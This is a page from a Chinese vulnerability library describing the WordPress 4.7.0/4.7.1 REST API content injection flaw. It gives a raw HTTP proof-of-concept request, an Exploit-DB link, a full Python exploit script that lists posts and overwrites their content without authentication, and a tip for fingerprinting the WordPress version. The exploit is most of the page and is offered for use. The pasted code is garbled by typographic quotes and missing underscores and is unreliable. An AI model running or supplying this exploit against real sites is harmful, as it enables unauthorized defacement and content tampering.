WordPress 4.7.0/4.7.1 Content Injection-漏洞文库小世界-安全文库-NGC660 安全实验室

WordPress 4.7.0/4.7.1 Content Injection

1、POC

POST /wp-json/wp/v2/posts/1?id=1a
HOST: 127.0.0.1
{“title”:“vlong”}

2、POC下载地址

[https://www.exploit-db.com/exploits/41223](https://www.exploit-db.com/exploits/41223)

import json import sys

import urllib2

from lxml import etree

def get_api_url(wordpress_url):

response = urllib2.urlopen(wordpress_url)

data = etree.HTML(response.read())

u = data.xpath(‘//link[@rel=”https://api.w.org/“]/@href’)[0]

# check if we have permalinks

if ‘rest_route’ in u:

print(’ ! Warning, looks like permalinks are not enabled. This might not work!‘)

return u

def get_posts(api_base):

respone = urllib2.urlopen(api_base + ‘wp/v2/posts’)

posts = json.loads(respone.read())

for post in posts:

print(’ – Post ID: {0}, Title: {1}, Url: {2}’

.format(post[‘id’], post[‘title’][‘rendered’], post[‘link’]))

def update_post(api_base, post_id, post_content):

# more than just the content field can be updated. see the api docs here:

https://developer.wordpress.org/rest-api/reference/posts/#update-a-post

data = json.dumps({

’content’: post_content

})

url = api_base + ‘wp/v2/posts/{post_id}/?id={post_id}abc’.format(post_id=post_id)

req = urllib2.Request(url, data, {‘Content-Type’: ‘application/json’})

response = urllib2.urlopen(req).read()

print(‘* Post updated. Check it out at {0}’.format(json.loads(response)[‘link’]))

def print_usage():

print(‘Usage: {0} (optional: )’.format(file))

if name == ‘main’:

# ensure we have at least a url

if len(sys.argv) < 2:

print_usage()

sys.exit(1)

# if we have a post id, we need content too

if 2 < len(sys.argv) < 4:

print(‘Please provide a file with post content with a post id’)

print_usage()

sys.exit(1)

print(‘* Discovering API Endpoint’)

api_url = get_api_url(sys.argv[1])

print(‘* API lives at: {0}’.format(api_url))

# if we only have a url, show the posts we have have

if len(sys.argv) < 3:

print(‘* Getting available posts’)

get_posts(api_url)

sys.exit(0)

# if we get here, we have what we need to update a post!

print(‘* Updating post {0}’.format(sys.argv[2]))

with open(sys.argv[3], ‘r’) as content:

new_content = content.readlines()

update_post(api_url, sys.argv[2], “.join(new_content))

print(‘* Update complete!’)

 

3、查看wordpress版本

打开网站源代码搜索 generator
请登录后发表评论

    请登录后查看回复内容